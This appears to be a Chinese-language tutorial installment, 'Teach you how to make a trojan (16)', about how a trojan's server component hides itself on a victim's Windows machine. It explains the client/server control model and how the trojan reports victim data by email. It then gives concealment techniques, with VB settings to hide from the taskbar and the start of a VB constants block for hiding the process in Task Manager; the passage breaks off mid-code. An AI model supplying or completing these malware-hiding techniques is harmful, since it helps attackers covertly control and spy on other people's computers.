教你如何做木马(16)

主要是讲解木马的危险和系统安全

5木马的隐藏方式

为了使木马不被别人发现，我们需要将我们的木马隐藏起来，隐藏原理大多一样，

大多数木马程序的基本原理都是一样的，他们是由两个程序配合使用——被安装在入侵

系统内的Server程序；另一个是对Server其控制作用的Client程序。学习者已经了

解了木马和病毒的区别，大多数Server程序不会像病毒一样主动传播，而是潜伏在一

些合法程序内部，然后由目标操作者亲手将其安装到系统中，虽然这一切都是没有经过

目标操作者授权的，然而从某种程度上说，这的确是在经过诱惑后目标“心甘情愿”接

收木马的，当Server安装成功后，黑客就可以通过Client控制程序对Server端进行

各种操作了。

木马程序的Server端为了隐藏自己，必须在设计中做到不让自己显示到任务栏或者系

统进程控制器中，同时还不会影响其他程序的正常运行，当使用者电脑处于断线状态下，

Server段不会发送任何信息到预设的端口上，而会自动检测网络状态直到网络连接好，

Server会通过email或者其他形式将Server端系统资料通知Client端，同时接收

Client发送出来的请求。

1.在任务栏里隐藏 这是最基本的隐藏方式。如果在windows的任务栏里出现一个莫名其妙的图标，傻子都

会明白是怎么回事。要实现在任务栏中隐藏在编程时是很容易实现的。我们以VB为例。

在VB中，只要把from的Visible属性设置为False,ShowInTaskBar设为False程序就

不会出现在任务栏里了。

2.在任务管理器里隐藏

查看正在运行的进程最简单的方法就是按下Ctrl+Alt+Del时出现的任务管理器。如果

你按下Ctrl+Alt+Del后可以看见一个木马程序在运行，那么这肯定不是什么好木马。

所以，木马会千方百计地伪装自己，使自己不出现在任务管理器里。木马发现把自己设

为 "系统服务“就可以轻松地骗过去。在VB中，通过如下的代码就可以实现这一功能：

Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004

Private Const STATUS_ACCESS_DENIED = &HC0000022

Private Const STATUS_INVALID_HANDLE = &HC0000008

Private Const ERROR_SUCCESS = 0&

Private Const SECTION_MAP_WRITE = &H2

Private Const SECTION_MAP_READ = &H4

Private Const READ_CONTROL = &H20000

Private Const WRITE_DAC = &H40000

Private Const NO_INHERITANCE = 0

Private Const DACL_SECURITY_INFORMATION = &H4

Private Type IO_STATUS_BLOCK